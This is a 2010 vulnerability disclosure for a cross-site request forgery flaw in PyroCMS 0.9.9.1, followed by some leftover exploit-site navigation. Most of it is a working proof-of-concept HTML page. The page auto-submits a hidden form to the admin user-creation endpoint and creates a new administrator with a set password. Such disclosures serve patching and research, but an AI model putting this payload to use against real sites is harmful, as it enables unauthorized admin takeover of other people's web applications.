pyrocms-xsrf.txt

Posted on 13 July 2010
<!------------------------------------------------------------------------
# Software................PyroCMS 0.9.9.1
# Vulnerability...........Cross-site Request Forgery
# Download................http://pyrocms.com/
# Release Date............7/11/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://cross-site-scripting.blogspot.com/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A cross-site request forgery vulnerability in PyroCMS 0.9.9.1 can be
# exploited to create a new admin.
#
#
# --PoC-->

<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/pyrocms/index.php/admin/users/create">
<input type="hidden" name="first_name" value="a" />
<input type="hidden" name="last_name" value="a" />
<input type="hidden" name="email" value="new_admin@x.com" />
<input type="hidden" name="username" value="new_admin" />
<input type="hidden" name="display_name" value="a" />
<input type="hidden" name="group" value="admin" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="password" value="Password1" />
<input type="hidden" name="confirm_password" value="Password1" />
<input type="hidden" name="btnAction" value="save" />
</form>
</body>
</html>
TOP
Malware :

Last 20
Exploits :

Last 20